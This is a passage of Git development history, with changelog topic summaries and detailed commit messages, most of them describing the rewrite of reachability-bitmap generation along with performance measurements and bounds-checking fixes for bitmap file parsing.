The transport layer was taught to optionally exchange the session
ID assigned by the trace2 subsystem during fetch/push transactions.
* js/trace2-session-id:
receive-pack: log received client session ID
send-pack: advertise session ID in capabilities
upload-pack, serve: log received client session ID
fetch-pack: advertise session ID in capabilities
transport: log received server session ID
serve: advertise session ID in v2 capabilities
receive-pack: advertise session ID in v0 capabilities
upload-pack: advertise session ID in v0 capabilities
trace2: add a public function for getting the SID
docs: new transfer.advertiseSID option
docs: new capability to advertise session IDs
"git apply" adjusted the permission bits of working-tree files and
directories according core.sharedRepository setting by mistake and
for a long time, which has been corrected.
* mt/do-not-use-scld-in-working-tree:
apply: don't use core.sharedRepository to create working tree files
"git maintenance" command had trouble working in a directory whose
pathname contained an ERE metacharacter like '+'.
* ds/maintenance-part-3:
maintenance: use 'git config --fixed-value'
Various subcommands of "git config" that takes value_regex
learn the "--literal-value" option to take the value_regex option
as a literal string.
* ds/config-literal-value:
config doc: value-pattern is not necessarily a regexp
config: implement --fixed-value with --get*
config: plumb --fixed-value into config API
config: add --fixed-value option, un-implemented
t1300: add test for --replace-all with value-pattern
t1300: test "set all" mode with value-pattern
config: replace 'value_regex' with 'value_pattern'
config: convert multi_replace to flags
Processes that access packdata while the .idx file gets removed
(e.g. while repacking) did not fail or fall back gracefully as they
could.
* tb/idx-midx-race-fix:
midx.c: protect against disappearing packs
packfile.c: protect against disappearing indexes
"git update-ref --stdin" learns to take multiple transactions in a
single session.
* ps/update-ref-multi-transaction:
update-ref: disallow "start" for ongoing transactions
p1400: use `git-update-ref --stdin` to test multiple transactions
update-ref: allow creation of multiple transactions
t1400: avoid touching refs on filesystem
"git add -i" failed to honor custom colors configured to show
patches, which has been corrected.
* js/add-i-color-fix:
add -i: verify in the tests that colors can be overridden
add -p: prefer color.diff.context over color.diff.plain
add -i (Perl version): color header to match the C version
add -i (built-in): use the same indentation as the Perl version
add -p (built-in): do not color the progress indicator separately
add -i (built-in): use correct names to load color.diff.* config
add -i (built-in): prevent the `reset` "color" from being configured
add -i: use `reset_color` consistently
add -p (built-in): imitate `xdl_format_hunk_hdr()` generating hunk headers
add -i (built-in): send error messages to stderr
add -i (built-in): do show an error message for incorrect inputs
If the old bitmap file contains a bitmap for a given commit, then that
commit does not need help from intermediate commits in its history to
compute its final bitmap. Eject that commit from the walk and insert it
into a separate list of reusable commits that are eventually stored in
the list of commits for computing bitmaps.
This helps the repeat bitmap computation task, even if the selected
commits shift drastically. This helps when a previously-bitmapped commit
exists in the first-parent history of a newly-selected commit. Since we
stop the walk at these commits and we use a first-parent walk, it is
harder to walk "around" these bitmapped commits. It's not impossible,
but we can greatly reduce the computation time for many selected
commits.
| runtime (sec) | peak heap (GB) |
| | |
| from | with | from | with |
| scratch | existing | scratch | existing |
-----------+---------+----------+---------+-----------
last patch | 88.478 | 53.218 | 2.157 | 2.224 |
this patch | 86.681 | 16.164 | 2.157 | 2.222 |
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous commits improved the bitmap computation process for very
long, linear histories with many refs by removing quadratic growth in
how many objects were walked. The strategy of computing "intermediate
commits" using bitmasks for which refs can reach those commits
partitioned the poset of reachable objects so each part could be walked
exactly once. This was effective for linear histories.
However, there was a (significant) drawback: wide histories with many
refs had an explosion of memory costs to compute the commit bitmasks
during the exploration that discovers these intermediate commits. Since
these wide histories are unlikely to repeat walking objects, the benefit
of walking objects multiple times was not expensive before. But now, the
commit walk *before computing bitmaps* is incredibly expensive.
In an effort to discover a happy medium, this change reduces the walk
for intermediate commits to only the first-parent history. This focuses
the walk on how the histories converge, which still has significant
reduction in repeat object walks. It is still possible to create
quadratic behavior in this version, but it is probably less likely in
realistic data shapes.
Here is some data taken on a fresh clone of the kernel:
| runtime (sec) | peak heap (GB) |
| | |
| from | with | from | with |
| scratch | existing | scratch | existing |
-----------+---------+----------+---------+-----------
original | 64.044 | 83.241 | 2.088 | 2.194 |
last patch | 45.049 | 37.624 | 2.267 | 2.334 |
this patch | 88.478 | 53.218 | 2.157 | 2.224 |
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Helped-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When constructing new bitmaps, we perform a commit and tree walk in
fill_bitmap_commit() and fill_bitmap_tree(). This walk would benefit
from using existing bitmaps when available. We must track the existing
bitmaps and translate them into the new object order, but this is
generally faster than parsing trees.
In fill_bitmap_commit(), we must reorder thing somewhat. The priority
queue walks commits from newest-to-oldest, which means we correctly stop
walking when reaching a commit with a bitmap. However, if we walk trees
interleaved with the commits, then we might be parsing trees that are
actually part of a re-used bitmap. To avoid over-walking trees, add them
to a LIFO queue and walk them after exploring commits completely.
On git.git, this reduces a second immediate bitmap computation from 2.0s
to 1.0s. On linux.git, we go from 32s to 22s. On chromium's fork
network, we go from 227s to 198s.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'find_objects()' currently needs to interact with the bitmaps khash
pretty closely. To make 'find_objects()' read a little more
straightforwardly, remove some of the khash-level details into a new
function that describes what it does: 'add_commit_to_bitmap()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A couple of callers within pack-bitmap.c duplicate logic to lookup a
given object id in the bitamps khash. Factor this out into a new
function, 'bitmap_for_commit()' to reduce some code duplication.
Make this new function non-static, since it will be used in later
commits from outside of pack-bitmap.c.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The on-disk bitmap format has a flag to mark a bitmap to be "reused".
This is a rather curious feature, and works like this:
- a run of pack-objects would decide to mark the last 80% of the
bitmaps it generates with the reuse flag
- the next time we generate bitmaps, we'd see those reuse flags from
the last run, and mark those commits as special:
- we'd be more likely to select those commits to get bitmaps in
the new output
- when generating the bitmap for a selected commit, we'd reuse the
old bitmap as-is (rearranging the bits to match the new pack, of
course)
However, neither of these behaviors particularly makes sense.
Just because a commit happened to be bitmapped last time does not make
it a good candidate for having a bitmap this time. In particular, we may
choose bitmaps based on how recent they are in history, or whether a ref
tip points to them, and those things will change. We're better off
re-considering fresh which commits are good candidates.
Reusing the existing bitmap _is_ a reasonable thing to do to save
computation. But only reusing exact bitmaps is a weak form of this. If
we have an old bitmap for A and now want a new bitmap for its child, we
should be able to compute that only by looking at trees and that are new
to the child. But this code would consider only exact reuse (which is
perhaps why it was eager to select those commits in the first place).
Furthermore, the recent switch to the reverse-edge algorithm for
generating bitmaps dropped this optimization entirely (and yet still
performs better).
So let's do a few cleanups:
- drop the whole "reusing bitmaps" phase of generating bitmaps. It's
not helping anything, and is mostly unused code (or worse, code that
is using CPU but not doing anything useful)
- drop the use of the on-disk reuse flag to select commits to bitmap
- stop setting the on-disk reuse flag in bitmaps we generate (since
nothing respects it anymore)
We will keep a few innards of the reuse code, which will help us
implement a more capable version of the "reuse" optimization:
- simplify rebuild_existing_bitmaps() into a function that only builds
the mapping of bits between the old and new orders, but doesn't
actually convert any bitmaps
- make rebuild_bitmap() public; we'll call it lazily to convert bitmaps
as we traverse (using the mapping created above)
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The bitmap_writer_build() method calls bitmap_builder_init() to
construct a list of commits reachable from the selected commits along
with a "reverse graph". This reverse graph has edges pointing from a
commit to other commits that can reach that commit. After computing a
reachability bitmap for a commit, the values in that bitmap are then
copied to the reachability bitmaps across the edges in the reverse
graph.
We can now relax the role of the reverse graph to greatly reduce the
number of intermediate reachability bitmaps we compute during this
reverse walk. The end result is that we walk objects the same number of
times as before when constructing the reachability bitmaps, but we also
spend much less time copying bits between bitmaps and have much lower
memory pressure in the process.
The core idea is to select a set of "important" commits based on
interactions among the sets of commits reachable from each selected commit.
The first technical concept is to create a new 'commit_mask' member in the
bb_commit struct. Note that the selected commits are provided in an
ordered array. The first thing to do is to mark the ith bit in the
commit_mask for the ith selected commit. As we walk the commit-graph, we
copy the bits in a commit's commit_mask to its parents. At the end of
the walk, the ith bit in the commit_mask for a commit C stores a boolean
representing "The ith selected commit can reach C."
As we walk, we will discover non-selected commits that are important. We
will get into this later, but those important commits must also receive
bit positions, growing the width of the bitmasks as we walk. At the true
end of the walk, the ith bit means "the ith _important_ commit can reach
C."
MAXIMAL COMMITS
---------------
We use a new 'maximal' bit in the bb_commit struct to represent whether
a commit is important or not. The term "maximal" comes from the
partially-ordered set of commits in the commit-graph where C >= P if P
is a parent of C, and then extending the relationship transitively.
Instead of taking the maximal commits across the entire commit-graph, we
instead focus on selecting each commit that is maximal among commits
with the same bits on in their commit_mask. This definition is
important, so let's consider an example.
Suppose we have three selected commits A, B, and C. These are assigned
bitmasks 100, 010, and 001 to start. Each of these can be marked as
maximal immediately because they each will be the uniquely maximal
commit that contains their own bit. Keep in mind that that these commits
may have different bitmasks after the walk; for example, if B can reach
C but A cannot, then the final bitmask for C is 011. Even in these
cases, C would still be a maximal commit among all commits with the
third bit on in their masks.
Now define sets X, Y, and Z to be the sets of commits reachable from A,
B, and C, respectively. The intersections of these sets correspond to
different bitmasks:
* 100: X - (Y union Z)
* 010: Y - (X union Z)
* 001: Z - (X union Y)
* 110: (X intersect Y) - Z
* 101: (X intersect Z) - Y
* 011: (Y intersect Z) - X
* 111: X intersect Y intersect Z
This can be visualized with the following Hasse diagram:
100 010 001
| \ / \ / |
| \/ \/ |
| /\ /\ |
| / \ / \ |
110 101 011
\___ | ___/
\ | /
111
Some of these bitmasks may not be represented, depending on the topology
of the commit-graph. In fact, we are counting on it, since the number of
possible bitmasks is exponential in the number of selected commits, but
is also limited by the total number of commits. In practice, very few
bitmasks are possible because most commits converge on a common "trunk"
in the commit history.
With this three-bit example, we wish to find commits that are maximal
for each bitmask. How can we identify this as we are walking?
As we walk, we visit a commit C. Since we are walking the commits in
topo-order, we know that C is visited after all of its children are
visited. Thus, when we get C from the revision walk we inspect the
'maximal' property of its bb_data and use that to determine if C is truly
important. Its commit_mask is also nearly final. If C is not one of the
originally-selected commits, then assign a bit position to C (by
incrementing num_maximal) and set that bit on in commit_mask. See
"MULTIPLE MAXIMAL COMMITS" below for more detail on this.
Now that the commit C is known to be maximal or not, consider each
parent P of C. Compute two new values:
* c_not_p : true if and only if the commit_mask for C contains a bit
that is not contained in the commit_mask for P.
* p_not_c : true if and only if the commit_mask for P contains a bit
that is not contained in the commit_mask for P.
If c_not_p is false, then P already has all of the bits that C would
provide to its commit_mask. In this case, move on to other parents as C
has nothing to contribute to P's state that was not already provided by
other children of P.
We continue with the case that c_not_p is true. This means there are
bits in C's commit_mask to copy to P's commit_mask, so use bitmap_or()
to add those bits.
If p_not_c is also true, then set the maximal bit for P to one. This means
that if no other commit has P as a parent, then P is definitely maximal.
This is because no child had the same bitmask. It is important to think
about the maximal bit for P at this point as a temporary state: "P is
maximal based on current information."
In contrast, if p_not_c is false, then set the maximal bit for P to
zero. Further, clear all reverse_edges for P since any edges that were
previously assigned to P are no longer important. P will gain all
reverse edges based on C.
The final thing we need to do is to update the reverse edges for P.
These reverse edges respresent "which closest maximal commits
contributed bits to my commit_mask?" Since C contributed bits to P's
commit_mask in this case, C must add to the reverse edges of P.
If C is maximal, then C is a 'closest' maximal commit that contributed
bits to P. Add C to P's reverse_edges list.
Otherwise, C has a list of maximal commits that contributed bits to its
bitmask (and this list is exactly one element). Add all of these items
to P's reverse_edges list. Be careful to ignore duplicates here.
After inspecting all parents P for a commit C, we can clear the
commit_mask for C. This reduces the memory load to be limited to the
"width" of the commit graph.
Consider our ABC/XYZ example from earlier and let's inspect the state of
the commits for an interesting bitmask, say 011. Suppose that D is the
only maximal commit with this bitmask (in the first three bits). All
other commits with bitmask 011 have D as the only entry in their
reverse_edges list. D's reverse_edges list contains B and C.
COMPUTING REACHABILITY BITMAPS
------------------------------
Now that we have our definition, let's zoom out and consider what
happens with our new reverse graph when computing reachability bitmaps.
We walk the reverse graph in reverse-topo-order, so we visit commits
with largest commit_masks first. After we compute the reachability
bitmap for a commit C, we push the bits in that bitmap to each commit D
in the reverse edge list for C. Then, when we finally visit D we already
have the bits for everything reachable from maximal commits that D can
reach and we only need to walk the objects in the set-difference.
In our ABC/XYZ example, when we finally walk for the commit A we only
need to walk commits with bitmask equal to A's bitmask. If that bitmask
is 100, then we are only walking commits in X - (Y union Z) because the
bitmap already contains the bits for objects reachable from (X intersect
Y) union (X intersect Z) (i.e. the bits from the reachability bitmaps
for the maximal commits with bitmasks 110 and 101).
The behavior is intended to walk each commit (and the trees that commit
introduces) at most once while allocating and copying fewer reachability
bitmaps. There is one caveat: what happens when there are multiple
maximal commits with the same bitmask, with respect to the initial set
of selected commits?
MULTIPLE MAXIMAL COMMITS
------------------------
Earlier, we mentioned that when we discover a new maximal commit, we
assign a new bit position to that commit and set that bit position to
one for that commit. This is absolutely important for interesting
commit-graphs such as git/git and torvalds/linux. The reason is due to
the existence of "butterflies" in the commit-graph partial order.
Here is an example of four commits forming a butterfly:
I J
|\ /|
| \/ |
| /\ |
|/ \|
M N
\ /
|/
Q
Here, I and J both have parents M and N. In general, these do not need
to be exact parent relationships, but reachability relationships. The
most important part is that M and N cannot reach each other, so they are
independent in the partial order. If I had commit_mask 10 and J had
commit_mask 01, then M and N would both be assigned commit_mask 11 and
be maximal commits with the bitmask 11. Then, what happens when M and N
can both reach a commit Q? If Q is also assigned the bitmask 11, then it
is not maximal but is reachable from both M and N.
While this is not necessarily a deal-breaker for our abstract definition
of finding maximal commits according to a given bitmask, we have a few
issues that can come up in our larger picture of constructing
reachability bitmaps.
In particular, if we do not also consider Q to be a "maximal" commit,
then we will walk commits reachable from Q twice: once when computing
the reachability bitmap for M and another time when computing the
reachability bitmap for N. This becomes much worse if the topology
continues this pattern with multiple butterflies.
The solution has already been mentioned: each of M and N are assigned
their own bits to the bitmask and hence they become uniquely maximal for
their bitmasks. Finally, Q also becomes maximal and thus we do not need
to walk its commits multiple times. The final bitmasks for these commits
are as follows:
I:10 J:01
|\ /|
| \ _____/ |
| /\____ |
|/ \ |
M:111 N:1101
\ /
Q:1111
Further, Q's reverse edge list is { M, N }, while M and N both have
reverse edge list { I, J }.
PERFORMANCE MEASUREMENTS
------------------------
Now that we've spent a LOT of time on the theory of this algorithm,
let's show that this is actually worth all that effort.
To test the performance, use GIT_TRACE2_PERF=1 when running
'git repack -abd' in a repository with no existing reachability bitmaps.
This avoids any issues with keeping existing bitmaps to skew the
numbers.
Inspect the "building_bitmaps_total" region in the trace2 output to
focus on the portion of work that is affected by this change. Here are
the performance comparisons for a few repositories. The timings are for
the following versions of Git: "multi" is the timing from before any
reverse graph is constructed, where we might perform multiple
traversals. "reverse" is for the previous change where the reverse graph
has every reachable commit. Finally "maximal" is the version introduced
here where the reverse graph only contains the maximal commits.
Repository: git/git
multi: 2.628 sec
reverse: 2.344 sec
maximal: 2.047 sec
Repository: torvalds/linux
multi: 64.7 sec
reverse: 205.3 sec
maximal: 44.7 sec
So in all cases we've not only recovered any time lost to switching to
the reverse-edge algorithm, but we come out ahead of "multi" in all
cases. Likewise, peak heap has gone back to something reasonable:
Repository: torvalds/linux
multi: 2.087 GB
reverse: 3.141 GB
maximal: 2.288 GB
While I do not have access to full fork networks on GitHub, Peff has run
this algorithm on the chromium/chromium fork network and reported a
change from 3 hours to ~233 seconds. That network is particularly
beneficial for this approach because it has a long, linear history along
with many tags. The "multi" approach was obviously quadratic and the new
approach is linear.
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Helped-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Before 'load_bitmap_entries_v1()' reads an actual EWAH bitmap, it should
check that it can safely do so by ensuring that there are at least 6
bytes available to be read (four for the commit's index position, and
then two more for the xor offset and flags, respectively).
Likewise, it should check that the commit index it read refers to a
legitimate object in the pack.
The first fix catches a truncation bug that was exposed when testing,
and the second is purely precautionary.
There are some possible future improvements, not pursued here. They are:
- Computing the correct boundary of the bitmap itself in the caller
and ensuring that we don't read past it. This may or may not be
worth it, since in a truncation situation, all bets are off: (is the
trailer still there and the bitmap entries malformed, or is the
trailer truncated?). The best we can do is try to read what's there
as if it's correct data (and protect ourselves when it's obviously
bogus).
- Avoid the magic "6" by teaching read_be32() and read_u8() (both of
which are custom helpers for this function) to check sizes before
advancing the pointers.
- Adding more tests in this area. Testing these truncation situations
are remarkably fragile to even subtle changes in the bitmap
generation. So, the resulting tests are likely to be quite brittle.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The bitmap_builder_init() method walks the reachable commits in
topological order and constructs a "reverse graph" along the way. At the
moment, this reverse graph contains an edge from commit A to commit B if
and only if A is a parent of B. Thus, the name "children" is appropriate
for for this reverse graph.
In the next change, we will repurpose the reverse graph to not be
directly-adjacent commits in the commit-graph, but instead a more
abstract relationship. The previous changes have already incorporated
the necessary updates to fill_bitmap_commit() that allow these edges to
not be immediate children.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The current rev-list tests that check the bitmap data only work on HEAD
instead of multiple branches. Expand the test cases to handle both
'master' and 'other' branches.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
It can be helpful to check if a commit_list contains a commit. Use
pointer equality, assuming lookup_commit() was used.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The bitmap_is_subset() function checks if the 'self' bitmap contains any
bitmaps that are not on in the 'other' bitmap. Up until this patch, it
had a declaration, but no implementation or callers. A subsequent patch
will want this function, so implement it here.
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The current implementation of bitmap_writer_build() creates a
reachability bitmap for every walked commit. After computing a bitmap
for a commit, those bits are pushed to an in-progress bitmap for its
children.
fill_bitmap_commit() assumes the bits corresponding to objects
reachable from the parents of a commit are already set. This means that
when visiting a new commit, we only have to walk the objects reachable
between it and any of its parents.
A future change to bitmap_writer_build() will relax this condition so
not all parents have their bits set. Prepare for that by having
'fill_bitmap_commit()' walk parents until reaching commits whose bits
are already set. Then, walk the trees for these commits as well.
This has no functional change with the current implementation of
bitmap_writer_build().
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our algorithm to generate reachability bitmaps walks through the commit
graph from the bottom up, passing bitmap data from each commit to its
descendants. For a linear stretch of history like:
A -- B -- C
our sequence of steps is:
- compute the bitmap for A by walking its trees, etc
- duplicate A's bitmap as a starting point for B; we can now free A's
bitmap, since we only needed it as an intermediate result
- OR in any extra objects that B can reach into its bitmap
- duplicate B's bitmap as a starting point for C; likewise, free B's
bitmap
- OR in objects for C, and so on...
Rather than duplicating bitmaps and immediately freeing the original, we
can just pass ownership from commit to commit. Note that this doesn't
always work:
- the recipient may be a merge which already has an intermediate
bitmap from its other ancestor. In that case we have to OR our
result into it. Note that the first ancestor to reach the merge does
get to pass ownership, though.
- we may have multiple children; we can only pass ownership to one of
them
However, it happens often enough and copying bitmaps is expensive enough
that this provides a noticeable speedup. On a clone of linux.git, this
reduces the time to generate bitmaps from 205s to 70s. This is about the
same amount of time it took to generate bitmaps using our old "many
traversals" algorithm (the previous commit measures the identical
scenario as taking 63s). It unfortunately provides only a very modest
reduction in the peak memory usage, though.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The bitmap generation code works by iterating over the set of commits
for which we plan to write bitmaps, and then for each one performing a
traditional traversal over the reachable commits and trees, filling in
the bitmap. Between two traversals, we can often reuse the previous
bitmap result as long as the first commit is an ancestor of the second.
However, our worst case is that we may end up doing "n" complete
complete traversals to the root in order to create "n" bitmaps.
In a real-world case (the shared-storage repo consisting of all GitHub
forks of chromium/chromium), we perform very poorly: generating bitmaps
takes ~3 hours, whereas we can walk the whole object graph in ~3
minutes.
This commit completely rewrites the algorithm, with the goal of
accessing each object only once. It works roughly like this:
- generate a list of commits in topo-order using a single traversal
- invert the edges of the graph (so have parents point at their
children)
- make one pass in reverse topo-order, generating a bitmap for each
commit and passing the result along to child nodes
We generate correct results because each node we visit has already had
all of its ancestors added to the bitmap. And we make only two linear
passes over the commits.
We also visit each tree usually only once. When filling in a bitmap, we
don't bother to recurse into trees whose bit is already set in the
bitmap (since we know we've already done so when setting their bit).
That means that if commit A references tree T, none of its descendants
will need to open T again. I say "usually", though, because it is
possible for a given tree to be mentioned in unrelated parts of history
(e.g., cherry-picking to a parallel branch).
So we've accomplished our goal, and the resulting algorithm is pretty
simple to understand. But there are some downsides, at least with this
initial implementation:
- we no longer reuse the results of any on-disk bitmaps when
generating. So we'd expect to sometimes be slower than the original
when bitmaps already exist. However, this is something we'll be able
to add back in later.
- we use much more memory. Instead of keeping one bitmap in memory at
a time, we're passing them up through the graph. So our memory use
should scale with the graph width (times the size of a bitmap).
So how does it perform?
For a clone of linux.git, generating bitmaps from scratch with the old
algorithm took 63s. Using this algorithm it takes 205s. Which is much
worse, but _might_ be acceptable if it behaved linearly as the size
grew. It also increases peak heap usage by ~1G. That's not impossibly
large, but not encouraging.
On the complete fork-network of torvalds/linux, it increases the peak
RAM usage by 40GB. Yikes. (I forgot to record the time it took, but the
memory usage was too much to consider this reasonable anyway).
On the complete fork-network of chromium/chromium, I ran out of memory
before succeeding. Some back-of-the-envelope calculations indicate it
would need 80+GB to complete.
So at this stage, we've managed to make things much worse. But because
of the way this new algorithm is structured, there are a lot of
opportunities for optimization on top. We'll start implementing those in
the follow-on patches.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
There's no easy way to make a copy of a bitmap. Obviously a caller can
iterate over the bits and set them one by one in a new bitmap, but we
can go much faster by copying whole words with memcpy().
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We have a function to bitwise-OR an ewah into an uncompressed bitmap,
but not to OR two uncompressed bitmaps. Let's add it.
Interestingly, we have a public header declaration going back to
e1273106f6 (ewah: compressed bitmap implementation, 2013-11-14), but the
function was never implemented. That was all OK since there were no
users of 'bitmap_or()', but a first caller will be added in a couple of
patches.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
If you ask to set a bit in the Nth word and we haven't yet allocated
that many slots in our array, we'll increase the bitmap size to 2*N.
This means we might frequently end up with bitmaps that are twice the
necessary size (as soon as you ask for the biggest bit, we'll size up to
twice that).
But if we just allocate as many words as were asked for, we may not grow
fast enough. The worst case there is setting bit 0, then 1, etc. Each
time we grow we'd just extend by one more word, giving us linear
reallocations (and quadratic memory copies).
A middle ground is relying on alloc_nr(), which causes us to grow by a
factor of roughly 3/2 instead of 2. That's less aggressive than
doubling, and it may help avoid fragmenting memory. (If we start with N,
then grow twice, our total is N*(3/2)^2 = 9N/4. After growing twice,
that array of size 9N/4 can fit into the space vacated by the original
array and first growth, N+3N/2 = 10N/4 > 9N/4, leading to less
fragmentation in memory).
Our worst case is still 3/2N wasted bits (you set bit N-1, then setting
bit N causes us to grow by 3/2), but our average should be much better.
This isn't usually that big a deal, but it will matter as we shift the
reachability bitmap generation code to store more bitmaps in memory.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We auto-grow bitmaps when somebody asks to set a bit whose position is
outside of our currently allocated range. Other operations besides
single bit-setting might need to do this, too, so let's pull it into its
own function.
Note that we change the semantics a little: you now ask for the number
of words you'd like to have, not the id of the block you'd like to write
to.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
You can use "git rev-list --test-bitmap HEAD" to check that bitmaps
produce the same answer we'd get from a regular traversal. But if we
detect an error, we only print "mismatch", and still exit with a
successful error code.
That makes the uses of --test-bitmap in the test suite (e.g., in t5310)
mostly pointless: even if we saw an error, the tests wouldn't notice.
Let's instead call die(), which will let these tests work as designed,
and alert us if the bitmaps are bogus.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We truncate the .bitmap file to 512 bytes and expect to run into
problems reading an individual ewah file. But this length is somewhat
arbitrary, and just happened to work when the test was added in
9d2e330b17 (ewah_read_mmap: bounds-check mmap reads, 2018-06-14).
An upcoming commit will change the size of the history we create in the
test repo, which will cause this test to fail. We can future-proof it a
bit more by reducing the size of the truncated bitmap file.
Signed-off-by: Jeff King <peff@peff.net>
Helped-by: Junio C Hamano <gitster@pobox.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A .bitmap file may have a "name hash cache" extension, which puts a
sequence of uint32_t values (one per object) at the end of the file.
When we see a flag indicating this extension, we blindly subtract the
appropriate number of bytes from our available length. However, if the
.bitmap file is too short, we'll underflow our length variable and wrap
around, thinking we have a very large length. This can lead to reading
out-of-bounds bytes while loading individual ewah bitmaps.
We can fix this by checking the number of available bytes when we parse
the header. The existing "truncated bitmap" test is now split into two
tests: one where we don't have this extension at all (and hence actually
do try to read a truncated ewah bitmap) and one where we realize
up-front that we can't even fit in the cache structure. We'll check
stderr in each case to make sure we hit the error we're expecting.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When we parse a .bitmap header, we first check that we have enough bytes
to make a valid header. We do that based on sizeof(struct
bitmap_disk_header). However, as of 0f4d6cada8 (pack-bitmap: make bitmap
header handling hash agnostic, 2019-02-19), that struct oversizes its
checksum member to GIT_MAX_RAWSZ. That means we need to adjust for the
difference between that constant and the size of the actual hash we're
using. That commit adjusted the code which moves our pointer forward,
but forgot to update the size check.
This meant we were overly strict about the header size (requiring room
for a 32-byte worst-case hash, when sha1 is only 20 bytes). But in
practice it didn't matter because bitmap files tend to have at least 12
bytes of actual data anyway, so it was unlikely for a valid file to be
caught by this.
Let's fix it by pulling the header size into a separate variable and
using it in both spots. That fixes the bug and simplifies the code to make
it harder to have a mismatch like this in the future. It will also come
in handy in the next patch for more bounds checking.
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'ewah/ewah_bitmap.c:buffer_grow()' is responsible for growing the buffer
used to store the bits of an EWAH bitmap. It is essentially doing the
same task as the 'ALLOC_GROW()' macro, so use that instead.
This simplifies the callers of 'buffer_grow()', who no longer have to
ask for a specific size, but rather specify how much of the buffer they
need. They also no longer need to guard 'buffer_grow()' behind an if
statement, since 'ALLOC_GROW()' (and, by extension, 'buffer_grow()') is
a noop if the buffer is already large enough.
But, the most significant change is that this fixes a bug when calling
buffer_grow() with both 'alloc_size' and 'new_size' set to 1. In this
case, truncating integer math will leave the new size set to 1, causing
the buffer to never grow.
Instead, let alloc_nr() handle this, which asks for '(new_size + 16) * 3
/ 2' instead of 'new_size * 3 / 2'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
To allow us to consider a change in the default behavior of `git init`
where it uses a more inclusive name for the initial branch, we must
first teach the test suite not to rely on a specific default branch
name. In this patch, we teach t7064 that trick.
To that end, we set a specific name for the initial branch. Ideally, we
would simply start out by calling `git branch -M initial-branch`, but
there is a bug in `git branch -M` that does not allow renaming branches
unless they already have commits. This will be fixed in the
`js/init-defaultbranch-advice` topic, and until that time, we use the
equivalent (but less intuitive) `git checkout -f --orphan`.
Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Git diff reports a submodule directory as -dirty even when there are
only untracked files in the submodule directory. This is inconsistent
with what `git describe --dirty` says when run in the submodule
directory in that state.
Make `--ignore-submodules=untracked` the default for `git diff` when
there is no configuration variable or command line option, so that the
command would not give '-dirty' suffix to a submodule whose working
tree has untracked files, to make it consistent with `git
describe --dirty` that is run in the submodule working tree.
And also make `--ignore-submodules=none` the default for `git status`
so that the user doesn't end up deleting a submodule that has
uncommitted (untracked) files.
Signed-off-by: Sangeeta Jain <sangunb09@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Long time ago when the _git_complete helper was introduced, _gitk was
replaced with __gitk_main, and a placeholder for backwards compatibility
